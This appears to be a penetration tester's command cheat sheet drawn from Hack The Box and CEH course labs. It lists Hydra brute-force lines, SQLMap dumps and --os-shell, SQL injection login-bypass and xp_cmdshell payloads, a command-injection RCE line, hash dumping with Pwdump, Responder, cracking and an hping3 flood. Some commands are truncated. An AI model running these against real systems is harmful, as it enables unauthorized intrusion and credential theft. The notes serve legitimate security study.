# Useful commands

## Netdiscover 

```
netdiscover -i eth0 
```

## WPScan

```
wpscan --url http://scriptkiddie.htb:5000/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/ducksec/Boxes/htb/boxes/scriptkiddie/results/scriptkiddie.htb/scans/tcp5000/tcp_5000_http_wpscan.txt"
```

## Hydra

```
hydra -l b.gates -P /usr/share/wordlists/rockyou.txt -f 138.68.157.117 -s 31122  http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<title>Admin Panel - Login"
hydra -L ./harry-usernames.txt -P ./harry-pws.txt -u -f ssh://159.65.58.189:31104 -t 4
```


##  Steghide

```
steghide embed -ef test.txt -cf anotherduckjpg
steghide extract -sf anotherduckjpg 
```


## SQLMap

```
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
sqlmap -u "http://www.example.com/?id=1" --os-shell
```

## SQLi Manual

```
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
```

## Crunch

```
crunch 6 6 0123456789abcdef -o 6chars.txt
[Generate a dictionary file containing words with a minimum and maximum length of 6 (6 6) 
using the given characters (0123456789abcdef), saving the output to a file (-0 6chars.txt)]
```

## Cewl

```
cewl example.com -m 5 -w words.txt
```

## Searchsploit 

```
searchsploit — nmap file.xml  --> Search vulns inside a Nmap XML result
```

## Hashcat / John 

NT
```
john --format=lm hash.txt
hashcat -m 3000 ./words  hash.txt [-a 3]
```

NTLM
```
john --format=nt hash.txt
hashcat -m 1000 ./words  hash.txt [-a 3]
```

(NET)NTLMV1
```
john --format=netntlm hash.txt
hashcat -m 5500 ./words  hash.txt [-a 3]
```

(NET)NTLMV2 (RESPONDER)
```
john --format=netntlmv2 hash.txt
hashcat -m 5600 ./words hash.txt [-a 3]


https://hashcat.net/wiki/doku.php?id=frequently_asked_questions#how_do_i_extract_the_hashes_from_truecrypt_volumes

```

## Responder
```
sudo responder -I tun0
```

## xfreerdp

```
xfreerdp /v:<target> /u:<user> /p: <port>
```




## Wireshark Filters

```
https://www.infosecmatter.com/detecting-network-attacks-with-wireshark/

Filter by IP address: displays all traffic from IP, be it source or destination

ip.addr == 192.168.1.1
Filter by source address: display traffic only from IP source

ip.src == 192.168.0.1
Filter by destination: display traffic only form IP destination

ip.dst == 192.168.0.1
Filter by IP subnet: display traffic from subnet, be it source or destination

ip.addr = 192.168.0.1/24
Filter by protocol: filter traffic by protocol name

dns

http

ftp

arp

ssh

telnet

icmp
Exclude IP address: remove traffic from and to IP address

!ip.addr ==192.168.0.1
Display traffic between two specific subnet

ip.addr == 192.168.0.1/24 and ip.addr == 192.168.1.1/24
Display traffic between two specific workstations

ip.addr == 192.168.0.1 and ip.addr == 192.168.0.2
Filter by MAC

eth.addr = 00:50:7f:c5:b6:78
Filter TCP port

tcp.port == 80
Filter TCP port source

tcp.srcport == 80
Filter TCP port destination

tcp.dstport == 80
Find user agents

http.user_agent contains Firefox

!http.user_agent contains || !http.user_agent contains Chrome
Filter broadcast traffic

!(arp or icmp or dns)
Filter IP address and port

tcp.port == 80 && ip.addr == 192.168.0.1
Filter all http get requests

http.request
Filter all http get requests and responses

http.request or http.response
Filter three way handshake

tcp.flags.syn==1 or (tcp.seq==1 and tcp.ack==1 and tcp.len==0 and tcp.analysis.initial_rtt)
Find files by type

frame contains “(attachment|tar|exe|zip|pdf)”
Find traffic based on keyword

tcp contains facebook

frame contains facebook

Detecting SYN Floods

tcp.flags.syn == 1 and tcp.flags.ack == 0
```


## Misc

```

Module 02 : Enumeration 
ping www.moviescope.com –f –l 1500 -> Frame size

    tracert www.moviescope.com -> Determining hop count

Enumeration using Metasploit :
msfdb init
service postgresql start
msfconsole
msf > db_status
nmap -Pn -sS -A -oX Test 10.10.10.0/24
db_import Test
hosts -> To show all available hosts in the subnet
db_nmap -sS -A 10.10.10.16 -> To extract services of particular machine

    services -> to get all available services in a subnet

SMB Version Enumeration using MSF
use scanner/smb/smb_version
set RHOSTS 10.10.10.8-16
set THREADS 100
run

    hosts -> now exact os_flavor information has been updated

Module 03 : Scanning Networks
Port Scanning using Hping3:
hping3 --scan 1-3000 -S 10.10.10.10
--scan parameter defines the port range to scan and –S represents SYN flag.
Pinging the target using HPing3:
hping3 -c 3 10.10.10.10
-c 3 means that we only want to send three packets to the target machine.
UDP Packet Crafting
hping3 10.10.10.10 --udp --rand-source --data 500
TCP SYN request
hping3 -S 10.10.10.10 -p 80 -c 5
-S will perform TCP SYN request on the target machine, -p will pass the traffic through which port is assigned, and -c is the count of the packets sent to the Target machine.

    HPing flood
    hping3 10.10.10.10 --flood

Module 04 : Enumeration
SNMP Enumeration (161) :
nmap –sU –p 161 10.10.10.12
nmap -sU -p 161 --script=snmp-brute 10.10.10.12
msfconsole
use auxiliary/scanner/snmp/snmp_login
set RHOSTS and exploit
use auxiliary/scanner/snmp/snmp_enum

    set RHOSTS and exploit

NetBIOS Enumeration (139) : 
nbtstat –A 10.10.10.16
net use
net use \10.10.10.16\e ““\user:””
net use \10.10.10.16\e ““/user:””

    NetBIOS Enumerator

Enum4Linux Wins Enumeration :
enum4linux -u martin -p apple -U 10.10.10.12 -> Users Enumeration
enum4linux -u martin -p apple -o 10.10.10.12 -> OS Enumeration
enum4linux -u martin -p apple -P 10.10.10.12 -> Password Policy Information
enum4linux -u martin -p apple -G 10.10.10.12 -> Groups Information

    enum4linux -u martin -p apple -S 10.10.10.12 -> Share Policy Information (SMB Shares Enumeration

Active Directory LDAP Enumeration : ADExplorer
Module 05 : Vulnerability Analysis 
nikto -h 
 -Tuning 1 
Nessus runs on 
​
Username: admin 

    Password: password

Nessus -> Policies > Advanced scan
Discovery > Host Discovery > Turn off Ping the remote host
Port Scanning > check the Verify open TCP ports found by local port enumerators
Advanced
Max number of TCP sessions per host and = unlimited

    Max number of TCP sessions per scan = unlimited

Credentials > Windows > Username & Password
Save policy > Create new scan > User Defined
Enter name & Target
Schedule tab > Turn of Enabled

    Hit launch from drop-down of save.

Module 06 : System Hacking
NTLM Hash crack :
responder -I eth0
usr\share\responder\logs --> Responder log location

    john /usr/share/responder/logs/ntlm.txt

Rainbowtable crack using Winrtgen :
Open winrtgen and add new table
Select ntlm from Hash dropdown list.
Set Min Len as 4, Max Len as 6 and Chain Count 4000000
Select loweralpha from Charset dropdown list (it depends upon Password).

    rcrack_gui.exe to crack hash with rainbow table

Hash dump with Pwdump7 and crack with ohpcrack :
wmic useraccount get name,sid --> Get user acc names and SID
PwDump7.exe > c:\hashes.txt
Replace boxes in hashes.txt with relevant usernames from step 1.
Ophcrack.exe -> load -> PWDUMP File

    Tables -> Vista free -> select the table directory -> crack

Module 08 : Sniffing
http.request.method == “POST” -> Wireshark filter for filtering HTTP POST request 
Capture traffic from remote interface via wireshark
Capture > Options > Manage Interfaces 
Remote Interface > Add > Host &  Port (2002)

        Username & password > Start

Module 13 : Hacking Web Servers
FTP Bruteforce with Hydra

        hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11

Module 14 : Hacking Web Applications
Wordpress

    wpscan --url http://10.10.10.12:8080/CEH --enumerate u

WP password bruteforce
msfconsole

    use auxiliary/scanner/http/wordpress_login_enum

RCE 

        ping 127.0.0.1 | hostname | net user

Module 15 : SQL Injection
SQLMAP Extract DBS
sqlmap -u “

     --cookie="xookies xxx" --dbs

Extract Tables
sqlmap -u “

     --cookie="cookies xxx" -D moviescope --tables

Extract Columns
sqlmap -u “

     --cookie="cookies xxx" -D moviescope -T User_Login --columns

Dump Data
sqlmap -u “

     --cookie="cookies xxx" -D moviescope -T User_Login --dump

OS Shell to execute commands
sqlmap -u “

     --cookie="cookies xxx" --os-shell

Login bypass

    blah' or 1=1 --

Insert data into DB from login

    blah';insert into login values ('john','apple123');

Create database from login

    blah';create database mydatabase;

Execute cmd from login

        blah';exec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --

Module 19 : Cloud Computing

    owncloud

    ```
